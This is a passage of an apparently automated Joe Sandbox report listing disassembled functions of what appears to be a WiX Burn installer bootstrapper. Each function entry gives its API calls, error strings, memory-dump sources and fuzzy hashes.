Instruction ID: 30e53b51aa0a8c6328dab1e24758cf71a6369844bc3335d8c86a57540c850441
Opcode Fuzzy Hash: 9ca122ec68422d2f9c5517c67397423ae1e693a89e64e97aca8afcb202be73da
Instruction Fuzzy Hash: E631F971940515BFD710ABA4CC86F9E7BA8EB00364F100339F624E71D0C7359D419B90

Function 00CB6AAA Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 105COMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,00C91D72,00000000,00C9214A,00C91D72,00000000,?,00CB0BDD,00C91D72,?), ref: 00CB6AE1
GetLastError.KERNEL32(?,00CB0BDD,00C91D72,?), ref: 00CB6AEA

Strings

Failed to create operation complete event., xrefs: 00CB6B60
Failed to copy file name., xrefs: 00CB6ACC
Failed to wait for operation complete., xrefs: 00CB6BBF
cabextract.cpp, xrefs: 00CB6B0F, 00CB6B56, 00CB6BA3
Failed to create begin operation event., xrefs: 00CB6B19
Failed to create extraction thread., xrefs: 00CB6BAD

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CreateErrorEventLast
String ID: Failed to copy file name.$Failed to create begin operation event.$Failed to create extraction thread.$Failed to create operation complete event.$Failed to wait for operation complete.$cabextract.cpp
API String ID: 545576003-1680384675
Opcode ID: f4041bb9b7f1a58b0bf635e25faac84c7a4d6a96ca5a52b7808e6d365cfaaa90
Instruction ID: ebc14bdf3d8fdf591689933a549b8994a1c312b8d4dea99aa964751bd908b493
Opcode Fuzzy Hash: f4041bb9b7f1a58b0bf635e25faac84c7a4d6a96ca5a52b7808e6d365cfaaa90
Instruction Fuzzy Hash: 6821F7B32403067FD7203A65CCC6FAF26ADAB80724F25053EF216D71C1E678DD456261

Function 00C99C64 Relevance: 17.6, APIs: 3, Strings: 7, Instructions: 141COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00C99D78
_memset.LIBCMT ref: 00C99D87

Strings

Failed to copy variable name., xrefs: 00C99DAA
Overflow while dealing with variable array buffer allocation, xrefs: 00C99D3E
Failed to allocate room for more variables., xrefs: 00C99D12
Overflow while growing variable array size, xrefs: 00C99CA2
variable.cpp, xrefs: 00C99C98, 00C99CD5, 00C99D05, 00C99D31, 00C99DE2
Failed to allocate room for variables., xrefs: 00C99DEF
Overflow while calculating size of variable array buffer, xrefs: 00C99CDF

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memmove_memset
String ID: Failed to allocate room for more variables.$Failed to allocate room for variables.$Failed to copy variable name.$Overflow while calculating size of variable array buffer$Overflow while dealing with variable array buffer allocation$Overflow while growing variable array size$variable.cpp
API String ID: 3555123492-2816863117
Opcode ID: e3427f9f321c8cd53842622279904cf35add88b3bc8909a35c45245497f44af6
Instruction ID: 408c8ed2070ed1274b8607ade951e851b27953953d9e8b2ca2a91ccf9aba226d
Opcode Fuzzy Hash: e3427f9f321c8cd53842622279904cf35add88b3bc8909a35c45245497f44af6
Instruction Fuzzy Hash: FD41FD76B80305BBEF249A6CCC47F6AB7BCEB54705F20412EF645AA1C1E770DA009B54

Function 00CA15A1 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 100threadCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,00C91E12,?), ref: 00CA15C3
GetLastError.KERNEL32(?,?,00C91E12,?), ref: 00CA15D0
CreateThread.KERNELBASE(00000000,00000000,Function_000113ED,?,00000000,00000000), ref: 00CA1624
GetLastError.KERNEL32(?,?,00C91E12,?), ref: 00CA1631
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,00C91E12,?), ref: 00CA167C
CloseHandle.KERNEL32(00000001,?,?,00C91E12,?), ref: 00CA169C
FindCloseChangeNotification.KERNELBASE(?,?,?,00C91E12,?), ref: 00CA16A9

Strings

Failed to create the UI thread., xrefs: 00CA1662
Failed to create initialization event., xrefs: 00CA1601
uithread.cpp, xrefs: 00CA15F7, 00CA1658

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseCreateErrorLast$ChangeEventFindHandleMultipleNotificationObjectsThreadWait
String ID: Failed to create initialization event.$Failed to create the UI thread.$uithread.cpp
API String ID: 1372344712-3599963359
Opcode ID: e50d834fb4b6fe11037a07939d82779ad97b0cfb8c0ab5471daa87a898b7b61f
Instruction ID: 2eaa8faf32e7ad1aba2fdc045cee53288d42dbb67ebb61c5a8a19c9cc0f7077a
Opcode Fuzzy Hash: e50d834fb4b6fe11037a07939d82779ad97b0cfb8c0ab5471daa87a898b7b61f
Instruction Fuzzy Hash: 38316CB2D4020AFFDB009FE8CD86A9EBBB8EB04304F28847AF615F2190D7745B449B51

Function 00C93006 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 120fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNELBASE(00000000,?,00000008,00000000,00000000,00000000,00000000,?,?,?,00000000), ref: 00C93034
GetLastError.KERNEL32(?,?,?,00000000), ref: 00C9303E
ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000,?,00000000,?,?,?,00000000), ref: 00C930EB
GetLastError.KERNEL32(?,?,?,00000000), ref: 00C930F5

Strings

Failed to read data for message., xrefs: 00C93129
Failed to read message from pipe., xrefs: 00C930D8
pipe.cpp, xrefs: 00C930A1, 00C930CE, 00C9311F
Failed to allocate data for message., xrefs: 00C930AE

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastRead
String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$pipe.cpp
API String ID: 1948546556-3912962418
Opcode ID: a9d5878c86e116658be275c46d213f1b02ed826cfc77c003408607f6a0aeaf82
Instruction ID: 2065f6314d96aeaca0b9e3857c9b31eca79ae09ca639fabc402770218260177d
Opcode Fuzzy Hash: a9d5878c86e116658be275c46d213f1b02ed826cfc77c003408607f6a0aeaf82
Instruction Fuzzy Hash: C441E072A40258EBDF11DFA6CD89FAEBBB8EF04700F108469E515EA091D774CB409BA0

Function 00CA0EB0 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 65COMMON

Download Yara Rule

APIs

TlsSetValue.KERNEL32(?,?), ref: 00CA0EC6
GetLastError.KERNEL32 ref: 00CA0ED0
CoInitializeEx.OLE32(00000000,00000000), ref: 00CA0F12
CoUninitialize.OLE32(?,00CA03BD,?,?), ref: 00CA0F4F

Strings

Failed to set elevated cache pipe into thread local storage for logging., xrefs: 00CA0EFF
Failed to initialize COM., xrefs: 00CA0F1E
Failed to pump messages in child process., xrefs: 00CA0F3D
elevation.cpp, xrefs: 00CA0EF5

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorInitializeLastUninitializeValue
String ID: Failed to initialize COM.$Failed to pump messages in child process.$Failed to set elevated cache pipe into thread local storage for logging.$elevation.cpp
API String ID: 876858697-113251691
Opcode ID: 6d4291221b36f08c25420bd635f3ce048773788a3ea6db88245352f8e2f471f0
Instruction ID: db29bc742570070eae5291f492082c433284b9ab407ebfaef7e3cd3bceb67463
Opcode Fuzzy Hash: 6d4291221b36f08c25420bd635f3ce048773788a3ea6db88245352f8e2f471f0
Instruction Fuzzy Hash: 82110633A44627BFD72117D5DC0AF5EBB68AF02BA5F210129FA04F6150EB61ED0492D4

Function 00CC05BA Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 93processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CC05D1
CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00C92A9B,?,?,?,?,00000000,00000000), ref: 00CC0628
GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00CC0632
CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00CC067C
CloseHandle.KERNEL32(00C92A9B,?,?,?,?,00000000,00000000,00000000), ref: 00CC0689

Strings

"%ls" %ls, xrefs: 00CC05F5
procutil.cpp, xrefs: 00CC0657

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandle$CreateErrorLastProcess_memset
String ID: "%ls" %ls$procutil.cpp
API String ID: 1393943095-4145822745
Opcode ID: 4ce31debf59900829a51cedd03e74a195cd2dad5503c8579aa34cadb56b6ea4f
Instruction ID: 3917431d4e770501b8af0b387895f3ab70595ee316c961828c51065f9e51a252
Opcode Fuzzy Hash: 4ce31debf59900829a51cedd03e74a195cd2dad5503c8579aa34cadb56b6ea4f
Instruction Fuzzy Hash: AB212A7290024AEBDB119FE4CD81EAE7BB9EB44314F24043EF915E6150D6718E549B62

Function 00C92A21 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 73COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32(00000000,?,?,?), ref: 00C92A35

Part of subcall function 00CC208E: GetModuleFileNameW.KERNEL32(00C9213E,?,00000104,?,00000104,?,00000000,?,?,00C9213E,?,00000000,?,?,?,76EEC3F0), ref: 00CC20AF

CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,00000000,00000000), ref: 00C92ABA

Part of subcall function 00CC05BA: _memset.LIBCMT ref: 00CC05D1
Part of subcall function 00CC05BA: CreateProcessW.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00C92A9B,?,?,?,?,00000000,00000000), ref: 00CC0628
Part of subcall function 00CC05BA: GetLastError.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00CC0632
Part of subcall function 00CC05BA: CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,00000000,00000000), ref: 00CC067C
Part of subcall function 00CC05BA: CloseHandle.KERNEL32(00C92A9B,?,?,?,?,00000000,00000000,00000000), ref: 00CC0689

Strings

burn.unelevated, xrefs: 00C92A5E
Failed to get current process path., xrefs: 00C92A4D
Failed to allocate parameters for elevated process., xrefs: 00C92A7A
%ls -%ls %ls %ls %u, xrefs: 00C92A66
Failed to launch parent process with unelevate disabled: %ls, xrefs: 00C92AA4

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CloseHandle$Process$CreateCurrentErrorFileLastModuleName_memset
String ID: %ls -%ls %ls %ls %u$Failed to allocate parameters for elevated process.$Failed to get current process path.$Failed to launch parent process with unelevate disabled: %ls$burn.unelevated
API String ID: 1951228193-688900554
Opcode ID: b716f5c0b0f20f403c01f4b2411760aba1ed7762a5a20c89a6bcff7c5c494f38
Instruction ID: c7c93051ebd64dd1c02303d90f5f8db4d7895ffdeb082d178e1f84b6442f287d
Opcode Fuzzy Hash: b716f5c0b0f20f403c01f4b2411760aba1ed7762a5a20c89a6bcff7c5c494f38
Instruction Fuzzy Hash: B0216D32C40108FACF21ABE5DC46DEEBBB8EF50710B20816AF955B2111EB714F51BB91

Function 00CA11A9 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 111threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNELBASE(00000000,00000000,Function_00010EB0,?,00000000,00000000), ref: 00CA1232
GetLastError.KERNEL32(?,?,?,00C91DEA,?,?), ref: 00CA123E

Part of subcall function 00C9E916: WaitForSingleObject.KERNEL32(?,000493E0,00000000,?,?,00CA12AC,00000000,?,00CA0F5D,?,00000000,?,?,?,00C91DEA,?), ref: 00C9E928
Part of subcall function 00C9E916: GetLastError.KERNEL32(?,?,00CA12AC,00000000,?,00CA0F5D,?,00000000,?,?,?,00C91DEA,?,?), ref: 00C9E932

CloseHandle.KERNEL32(00000000,00000000,?,00CA0F5D,?,00000000,?,?,?,00C91DEA,?,?), ref: 00CA12BD

Strings

Failed to pump messages in child process., xrefs: 00CA1297
elevation.cpp, xrefs: 00CA1263
Failed to create elevated cache thread., xrefs: 00CA126D

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLast$CloseCreateHandleObjectSingleThreadWait
String ID: Failed to create elevated cache thread.$Failed to pump messages in child process.$elevation.cpp
API String ID: 3606931770-4134175193
Opcode ID: 98a5fc67a2bba6b3b5d683cd18e6e0218b0900cbd74a9c008c4569b730625f42
Instruction ID: cc2098cded4a0e1be2df40cedefd2b6ef4fd1e96077558eb40dff3e96649e736
Opcode Fuzzy Hash: 98a5fc67a2bba6b3b5d683cd18e6e0218b0900cbd74a9c008c4569b730625f42
Instruction Fuzzy Hash: 92412671A41219EFCB10DF98D885ADEBBF8FF49710F21412AF919E7340D770AA408BA0

Function 00CC5A7C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83memoryCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00CC5A92
SysAllocString.OLEAUT32(?), ref: 00CC5AAE
VariantClear.OLEAUT32(?), ref: 00CC5B35
SysFreeString.OLEAUT32(00000000), ref: 00CC5B40

Strings

xmlutil.cpp, xrefs: 00CC5AC5
`<u, xrefs: 00CC5B40

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: StringVariant$AllocClearFreeInit
String ID: `<u$xmlutil.cpp
API String ID: 760788290-3482516102
Opcode ID: 54f2ba9aa0146988b2f676e512fee4e01313b6db80e027b72ef89af9662dc8b6
Instruction ID: 88548cec167b15a4ff996f1a55c3ec6f7990a0d36febacd4ffbd801ff44589f2
Opcode Fuzzy Hash: 54f2ba9aa0146988b2f676e512fee4e01313b6db80e027b72ef89af9662dc8b6
Instruction Fuzzy Hash: 6F217F71A00619AFCB10DBE0C899FAEBBBCAF04715F150168F901EB251DB71EE81CB90

Function 00CC0484 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

OpenProcessToken.ADVAPI32(?,00000008,00000000,76EEC3F0,?,00000000), ref: 00CC04A6
GetLastError.KERNEL32 ref: 00CC04B0
GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00CC04E3
GetLastError.KERNEL32 ref: 00CC04FC
FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CC053C

Strings

procutil.cpp, xrefs: 00CC052A

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorLastToken$ChangeCloseFindInformationNotificationOpenProcess
String ID: procutil.cpp
API String ID: 3650908616-1178289305
Opcode ID: cdaf2d426eb4df96b2ac9380524f5f343acd13053077f33071c7a8ffb65a647a
Instruction ID: 5f1208c3ace6e009a3e1bdcb163d42aa0f095526122497712b48c9edfbb64aa7
Opcode Fuzzy Hash: cdaf2d426eb4df96b2ac9380524f5f343acd13053077f33071c7a8ffb65a647a
Instruction Fuzzy Hash: F0218172A4121AEFDB209FA5DC86FAEBBB8EF04350F21457DEA15E6050D2749F04DB90

Function 00CC5434 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 33COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00CC5443
InterlockedIncrement.KERNEL32(00CE7F08), ref: 00CC5460
CLSIDFromProgID.OLE32(Msxml2.DOMDocument,00CE7EF8), ref: 00CC547B
CLSIDFromProgID.OLE32(MSXML.DOMDocument,00CE7EF8), ref: 00CC5487

Strings

MSXML.DOMDocument, xrefs: 00CC5482
Msxml2.DOMDocument, xrefs: 00CC5476

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: FromProg$IncrementInitializeInterlocked
String ID: MSXML.DOMDocument$Msxml2.DOMDocument
API String ID: 2109125048-2356320334
Opcode ID: ce8d889805d32024b1308cc4d498d8b557bad84c448b699318539378b8ae0bca
Instruction ID: 9fa94116fbcf38432838d5d2c207a63e10dc6701fa0895de0dab0027a6544b1c
Opcode Fuzzy Hash: ce8d889805d32024b1308cc4d498d8b557bad84c448b699318539378b8ae0bca
Instruction Fuzzy Hash: AAF0E531B496B16ED32C87A3FC0EF1F2E68EB80B63F000528E911D2054D3A0ACC186F0

Function 00CA130D Relevance: 9.1, APIs: 6, Instructions: 84windowCOMMON

Download Yara Rule

APIs

DefWindowProcW.USER32(?,00000082,?,?), ref: 00CA1338
SetWindowLongW.USER32(?,000000EB,00000000), ref: 00CA1347
SetWindowLongW.USER32(?,000000EB,?), ref: 00CA135B
DefWindowProcW.USER32(?,?,?,?), ref: 00CA136B
GetWindowLongW.USER32(?,000000EB), ref: 00CA1385
PostQuitMessage.USER32(00000000), ref: 00CA13E0

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: Window$Long$Proc$MessagePostQuit
String ID:
API String ID: 3812958022-0
Opcode ID: f48476953a5a2d0a52535dc78450e68d2e4a2df0596efccc8d2f1f7d9adedfd5
Instruction ID: 99e08b8db04e52a170a01eb348fe09f6b364ac45e06cea4c3d4f795251e23003
Opcode Fuzzy Hash: f48476953a5a2d0a52535dc78450e68d2e4a2df0596efccc8d2f1f7d9adedfd5
Instruction Fuzzy Hash: 4F21BD3250421ABFDF015FA4DC4AE6A3B6AFB45325F1C4524FE229A1B0CA30CD10AB50

Function 00CB65EB Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 114COMMON

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(?,?,?,?,?,?), ref: 00CB66AE
GetLastError.KERNEL32 ref: 00CB66B8

Strings

Invalid seek type., xrefs: 00CB6627
Failed to move file pointer 0x%x bytes., xrefs: 00CB66EF
cabextract.cpp, xrefs: 00CB66E2

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
API String ID: 2976181284-417918914
Opcode ID: 0291d788e1126c536336d641c1bcdad10dc3e97e40513e1cdaedcfbe972030af
Instruction ID: e0042ebde4ed75c90bc214f258fca0845d6e70ac35912475ff3ef840136be1f2
Opcode Fuzzy Hash: 0291d788e1126c536336d641c1bcdad10dc3e97e40513e1cdaedcfbe972030af
Instruction Fuzzy Hash: 56413D71900205EFCB00CFA9C945AD9B7B4FF44324F1981A9F919EB261E739EE41DB50

Function 00CB0BFD Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 69COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00CB0C0F

Strings

Failed to get path for executing module., xrefs: 00CB0C5D
Failed to get container information for UX container., xrefs: 00CB0C46
Failed to open attached container., xrefs: 00CB0C7B
WixBundleElevated, xrefs: 00CB0C03

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: _memset
String ID: Failed to get container information for UX container.$Failed to get path for executing module.$Failed to open attached container.$WixBundleElevated
API String ID: 2102423945-2733515141
Opcode ID: 4dac687f42ed162f0260512d9a0aa532301eb59a5ddbe106a00e8ccafd090db5
Instruction ID: c907944d3b821d106000c4d57e4278befd71a9c4db3ad4bbe84b496e3db7aa11
Opcode Fuzzy Hash: 4dac687f42ed162f0260512d9a0aa532301eb59a5ddbe106a00e8ccafd090db5
Instruction Fuzzy Hash: D7116372D00219BACB11EBE4CD85DEFBBBCAB54714F20422AF519F7140EB705A05E791

Function 00C91033 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,?,0000011C), ref: 00C91057
InitializeCriticalSection.KERNEL32(?,?,0000011C), ref: 00C91060
GetCurrentProcess.KERNEL32(00000000,?,?,?,0000011C), ref: 00C9107E

Part of subcall function 00CC0484: OpenProcessToken.ADVAPI32(?,00000008,00000000,76EEC3F0,?,00000000), ref: 00CC04A6
Part of subcall function 00CC0484: GetLastError.KERNEL32 ref: 00CC04B0
Part of subcall function 00CC0484: FindCloseChangeNotification.KERNELBASE(00000000), ref: 00CC053C

Part of subcall function 00CC041E: _memset.LIBCMT ref: 00CC0446

Strings

Failed to verify elevation state., xrefs: 00C910B0
Failed to initialize engine section., xrefs: 00C910C9

Memory Dump Source

Source File: 00000001.00000002.3582108218.0000000000C91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00C90000, based on PE: true

Associated: 00000001.00000002.3582060680.0000000000C90000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582170095.0000000000CCB000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582232594.0000000000CE6000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000001.00000002.3582273539.0000000000CEC000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_c90000_UNK_.jbxd

Similarity

API ID: CriticalInitializeProcessSection$ChangeCloseCurrentErrorFindLastNotificationOpenToken_memset
String ID: Failed to initialize engine section.$Failed to verify elevation state.
API String ID: 347799009-3203524654
Opcode ID: ba5f90b96a51523641e78a223df514810cb63e7026e23fadfcb819689eb11dda
Instruction ID: c082c49e8f578e8cf5147c904fa43a254f53ab6eaf1f7b7b920d00ca4b2aa1d1
Opcode Fuzzy Hash: ba5f90b96a51523641e78a223df514810cb63e7026e23fadfcb819689eb11dda
Instruction Fuzzy Hash: 5311A5B2950715EADB20A7F4CC0BF8B73DCAF00355F14462AF956E3181EB75EA0097A5

Function 00CC3670 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 00CC309E: _memset.LIBCMT ref: 00CC30C5
Part of subcall function 00CC309E: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00CC30DA
